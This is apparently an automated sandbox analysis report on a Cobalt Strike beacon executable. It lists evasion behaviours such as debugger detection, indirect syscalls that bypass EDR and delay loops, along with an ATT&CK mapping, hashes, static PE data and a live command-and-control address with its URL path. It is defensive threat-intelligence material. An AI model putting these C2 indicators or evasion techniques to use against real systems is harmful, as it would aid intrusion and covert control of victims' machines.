Source: C:\Users\user\Desktop\beacon_x64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\beacon_x64.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\beacon_x64.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\beacon_x64.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\beacon_x64.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\beacon_x64.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\beacon_x64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\beacon_x64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\beacon_x64.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\beacon_x64.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\beacon_x64.exe	Section loaded: winnsi.dll	Jump to behavior

Source: C:\Users\user\Desktop\beacon_x64.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: beacon_x64.exe

Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_3_001A6060 push edi; iretd	0_3_001A6062
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_3_001A05FD pushfd ; iretd	0_3_001A05FE
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_0078A86F push ebp; iretd	0_2_0078A870
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_0078A84F push ebp; iretd	0_2_0078A850
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_0078A898 push ebp; iretd	0_2_0078A899
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_0076B91C pushad ; retf	0_2_0076B91D
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_0076F901 push ebx; iretd	0_2_0076F902
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_0076935D push edi; iretd	0_2_0076935E
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_0076AD58 push ebp; iretd	0_2_0076AD59
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_00778DC5 push FFFFFFF8h; ret	0_2_00778D74
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_00778D89 push FFFFFFF8h; ret	0_2_00778D38
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_0076971E push cs; retf	0_2_0076971F

Source: C:\Users\user\Desktop\beacon_x64.exe	Window / User API: threadDelayed 1821			Jump to behavior
Source: C:\Users\user\Desktop\beacon_x64.exe	Window / User API: threadDelayed 8039			Jump to behavior

Source: C:\Users\user\Desktop\beacon_x64.exe TID: 2144	Thread sleep count: 1821 > 30	Jump to behavior
Source: C:\Users\user\Desktop\beacon_x64.exe TID: 2144	Thread sleep time: -18210000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\beacon_x64.exe TID: 2144	Thread sleep count: 8039 > 30	Jump to behavior
Source: C:\Users\user\Desktop\beacon_x64.exe TID: 2144	Thread sleep time: -80390000s >= -30000s	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\beacon_x64.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\beacon_x64.exe	Last function: Thread delayed

Source: beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2993012953.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2970472525.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3069577014.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2982082108.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000002.4562753619.000000000081C000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3086750899.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2910089243.0000000000892000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\Desktop\beacon_x64.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

graph_0-16006

Found potential dummy code loops (likely to delay analysis)

Source: C:\Users\user\Desktop\beacon_x64.exe

Process Stats: CPU usage > 42% for more than 60s

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,	0_2_00401180
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	0_2_00401A70
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_004542E4 SetUnhandledExceptionFilter,VirtualAlloc,	0_2_004542E4
Source: C:\Users\user\Desktop\beacon_x64.exe	Code function: 0_2_00402F62 SetUnhandledExceptionFilter,	0_2_00402F62

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\beacon_x64.exe	NtAllocateVirtualMemory: Indirect: 0x77C294			Jump to behavior
Source: C:\Users\user\Desktop\beacon_x64.exe	NtProtectVirtualMemory: Indirect: 0x77C482			Jump to behavior

Source: C:\Users\user\Desktop\beacon_x64.exe

Code function: 0_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,

0_2_00401630

Source: C:\Users\user\Desktop\beacon_x64.exe

Code function: 0_2_00401990 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00401990

Source: C:\Users\user\Desktop\beacon_x64.exe

Code function: 0_2_00774E28 GetUserNameA,strrchr,_snprintf,

0_2_00774E28

Source: C:\Users\user\Desktop\beacon_x64.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match

File source: 00000000.00000002.4563882801.0000000000CB0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	211 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Process Injection	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	211 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	111 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	3 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
beacon_x64.exe	84%	ReversingLabs	Win64.Backdoor.CobaltStrike
beacon_x64.exe	79%	Virustotal		Browse
beacon_x64.exe	100%	Avira	HEUR/AGEN.1344321
beacon_x64.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://8.148.6.140/api/v1/get=	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/getSOR_A	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/get2	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/get8	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/getocal	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/gety	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/getem32	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/getbd06	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/get4	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/getue	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/getL	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/getJ	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/getP	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/get6666u	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/getstem32	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/get140/api/v1/get	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/get6666j	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/getll;	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/getH	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/getX	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/getd	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/getya	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/getlp	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/get#	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/get%	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/getllue	0%	Avira URL Cloud	safe
8.148.6.140	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/get	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/get(	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/get&	0%	Avira URL Cloud	safe
http://8.148.6.140/api/v1/getll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
8.148.6.140	true	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/get	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://8.148.6.140/api/v1/get=	beacon_x64.exe, 00000000.00000003.2910089243.0000000000892000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/getSOR_A	beacon_x64.exe, 00000000.00000003.3459929835.0000000000857000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000002.4562753619.000000000081C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/get4	beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/get2	beacon_x64.exe, 00000000.00000003.3086750899.0000000000892000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/getocal	beacon_x64.exe, 00000000.00000003.3459929835.0000000000857000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000002.4562753619.000000000081C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/get8	beacon_x64.exe, 00000000.00000003.3004099013.0000000000892000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/gety	beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/getbd06	beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/getem32	beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/getue	beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/getL	beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/getJ	beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/getP	beacon_x64.exe, 00000000.00000003.2836169500.0000000000892000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/getstem32	beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/getH	beacon_x64.exe, 00000000.00000003.2910089243.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2836169500.0000000000892000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/get6666u	beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/getll;	beacon_x64.exe, 00000000.00000003.2970472525.0000000000892000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/get6666j	beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/get140/api/v1/get	beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/getX	beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/getl	beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://8.148.6.140/api/v1/getp	beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://8.148.6.140/api/v1/getya	beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/getd	beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/get%	beacon_x64.exe, 00000000.00000003.2836169500.0000000000892000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/get#	beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/getllue	beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/getlp	beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/get(	beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3069577014.0000000000892000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/geth	beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://8.148.6.140/api/v1/get&	beacon_x64.exe, 00000000.00000003.2993012953.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2970472525.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3069577014.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2982082108.0000000000892000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://8.148.6.140/api/v1/getll	beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2993012953.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2970472525.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2982082108.0000000000892000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
8.148.6.140	unknown	Singapore		37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587366
Start date and time:	2025-01-10 09:24:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	beacon_x64.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 15 Number of non-executed functions: 53
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.253.45, 20.12.23.50
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:24:54	API Interceptor	12197843x Sleep call for process: beacon_x64.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	2873466535874-68348745.02.exe	Get hash	malicious	Unknown	Browse	118.178.60.103
	armv5l.elf	Get hash	malicious	Unknown	Browse	47.116.93.193
	3.elf	Get hash	malicious	Unknown	Browse	47.113.16.150
	armv7l.elf	Get hash	malicious	Unknown	Browse	8.181.124.11
	THsSNYblMw.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	47.121.190.121
	Fantazy.sh4.elf	Get hash	malicious	Unknown	Browse	139.242.78.130
	Fantazy.ppc.elf	Get hash	malicious	Unknown	Browse	47.114.96.229
	Fantazy.mips.elf	Get hash	malicious	Unknown	Browse	8.140.140.254
	k2vUsu5VZ5.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	47.121.190.121
	Fantazy.spc.elf	Get hash	malicious	Unknown	Browse	8.167.197.133

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.45199741721171
TrID:	Win64 Executable (generic) (12005/4) 74.80% Generic Win/DOS Executable (2004/3) 12.49% DOS Executable Generic (2002/1) 12.47% VXD Driver (31/22) 0.19% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	beacon_x64.exe
File size:	328'704 bytes
MD5:	af51e1dba9c7da4626ae4aac6e61a070
SHA1:	50bc787b1122f42e10c93814a51c8eee77d8d0bc
SHA256:	fca02dc798d591881b8f1eed5049339bca51fe7f6fffbda288076518da147e1b
SHA512:	b77a28a1228f0da0d25e7344cc95a3b99b7c55db71690ada566234d4a96bcba3d51e81478ca99ea58b00295d5e4b4920674a9107735b139cd182e5cdfcfe810b
SSDEEP:	6144:38XhZ3T+WpiMi0u0idCCEU3KnoJAa+yro01nLFqn:3eZ3KD0wCCEU3Knja1X
TLSH:	DF648C974EA4C37ECD09C43DF2979E420C3A826897BDC86BEC6E8D5CD080587E5B5E16
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."....................@..............................p................ ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4014c0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:	0x401ba0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	147442e63270e287ed57d33257638324

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [0004EFF5h]
mov dword ptr [eax], 00000001h
call 00007F368C7D7E9Fh
call 00007F368C7D768Ah
nop
nop
dec eax
add esp, 28h
ret
nop word ptr [eax+eax+00000000h]
nop dword ptr [eax]
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [0004EFC5h]
mov dword ptr [eax], 00000000h
call 00007F368C7D7E6Fh
call 00007F368C7D765Ah
nop
nop
dec eax
add esp, 28h
ret
nop word ptr [eax+eax+00000000h]
nop dword ptr [eax]
dec eax
sub esp, 28h
call 00007F368C7D9334h
dec eax
test eax, eax
sete al
movzx eax, al
neg eax
dec eax
add esp, 28h
ret
nop
nop
nop
nop
nop
nop
nop
dec eax
lea ecx, dword ptr [00000009h]
jmp 00007F368C7D79B9h
nop dword ptr [eax+00h]
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
dec eax
jmp ecx
dec eax
arpl word ptr [00002AC2h], ax
test eax, eax
jle 00007F368C7D7A08h
cmp dword ptr [00002ABBh], 00000000h
jle 00007F368C7D79FFh
dec eax
mov edx, dword ptr [00052CFEh]
dec eax
mov dword ptr [ecx+eax], edx
dec eax
mov edx, dword ptr [00052CFBh]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x54000	0x8d8	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x51000	0x2b8	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x50060	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x54224	0x1e8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20a8	0x2200	ba98beafce4128c14539a20f3e854b25	False	0.5734145220588235	data	6.010394259460846	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x4000	0x4bcf0	0x4be00	b364a5b313a09618b8f1dd72c1bbdfa1	False	0.6346530065897859	dBase III DBT, version number 0, next free block index 10, 1st item "\366\205\305Y\366\205\305Y\366\205\305Y\366\205\305Y\366\205\305Y\366\205\305Y\366\205\305Y\366\205\305\262\365\205\265Y\366\205\305Y\366\205\305Y\366\205\305y\365\205\265_\366\205\305Y\366\205\305Y\366\205\305Y\366\205\305Y\366\205\305Y\366\205\305Y\366\205\014D?AV0\366\205GX\365\205\305I\366\205\305[\365\205\305]\366\205\305Y\366\205\305Y\366\205\305Y\366\205\345Y\366\345\014B>XVQZ\205\307"	7.460821391528794	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x50000	0x910	0xa00	5fcc7830b4dcd602b35eeb7f1712e8fa	False	0.241796875	data	4.459688665734325	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
